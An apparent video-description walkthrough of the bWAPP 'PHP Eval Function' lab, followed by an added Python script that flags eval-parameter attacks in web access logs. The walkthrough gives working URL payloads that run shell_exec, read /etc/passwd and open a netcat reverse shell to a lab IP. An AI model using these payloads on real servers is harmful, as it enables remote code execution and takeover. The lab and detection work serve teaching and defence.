bWAPP - PHP Eval Function

Published: 19 April 2022
on channel: PseudoTime

PHP Eval Function - Low Security Level

Solution:

Step 1. As shown in the video, go through the source code.

Step 2. Let us test the eval parameter to see whether it really evaluates PHP code.
Modify the URL with the payload: ?eval=echo "PseudoTime";
Check the output - the input we supplied is displayed.

Step 3. Let us run system commands using the shell_exec function.
Modify the URL with the payload: ?eval=echo shell_exec("id");
Check the output - we get back the id of the current user on the remote host.

Step 4. Let us try to get the passwords.
Modify the URL with the payload: ?eval=echo shell_exec("cat /etc/passwd");
Check the output - the contents of /etc/passwd are displayed.

Step 5. Now, let us get a connect-back shell to our local box.
Open a command prompt and run the commands below:
ifconfig
nc -lvp 4444
Modify the URL with the payload: ?eval=echo shell_exec("nc -e /bin/sh 10.0.2.15 4444");
Change the IP to your local or beebox IP address.
** Note - I have tested this lesson on my local machine; you can test the same in your beebox. (Not covered in this video.)

PseudoTime
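
The requests from Steps 2 to 5 as a defender would see them, in an added example that is not part of the original video description: the script scans web access-log lines for an eval query parameter carrying PHP code or OS-command calls, including double-encoded values. The log lines, path and client addresses are constructed, and the function names are hypothetical.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Constructed access-log lines; the path and client addresses are made up.
SAMPLE_LOG = """\
192.0.2.10 - - [19/Apr/2022:10:00:01 +0000] "GET /app/page.php?lang=en HTTP/1.1" 200 901
192.0.2.10 - - [19/Apr/2022:10:00:09 +0000] "GET /app/page.php?eval=echo%20%22PseudoTime%22%3B HTTP/1.1" 200 915
192.0.2.10 - - [19/Apr/2022:10:00:31 +0000] "GET /app/page.php?eval=echo%20shell_exec(%22id%22)%3B HTTP/1.1" 200 960
192.0.2.77 - - [19/Apr/2022:10:02:45 +0000] "GET /app/page.php?eval=echo%2520shell_exec%2528%2522id%2522%2529%253B HTTP/1.1" 200 960
"""

# Client address and request target of each log line.
REQUEST_RE = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"', re.M)
# PHP functions (and backticks) that pass a string to the OS shell.
OS_EXEC_RE = re.compile(r"\b(shell_exec|system|exec|passthru|popen|proc_open)\s*\(|`", re.I)
# Anything that reads as a PHP statement rather than a plain value.
PHP_CODE_RE = re.compile(r"\b(echo|print|include|require)\b|\w+\s*\(|;\s*$", re.I)

def fully_decode(value, rounds=3):
    """Undo nested percent-encoding, e.g. %2528 -> %28 -> '('."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def classify(value):
    """Return 'os-command', 'php-code' or None for one parameter value."""
    value = fully_decode(value)
    if OS_EXEC_RE.search(value):
        return "os-command"
    if PHP_CODE_RE.search(value):
        return "php-code"
    return None

def scan(log_text, param="eval"):
    """Return (client, verdict, decoded value) for each suspicious request."""
    findings = []
    for m in REQUEST_RE.finditer(log_text):
        client, target = m.groups()
        for value in parse_qs(urlsplit(target).query).get(param, []):
            verdict = classify(value)
            if verdict:
                findings.append((client, verdict, fully_decode(value)))
    return findings

if __name__ == "__main__":
    print(*scan(SAMPLE_LOG), sep="\n")
```

Access logs record only the query string, so a parameter sent in a POST body needs application or WAF logging to be seen.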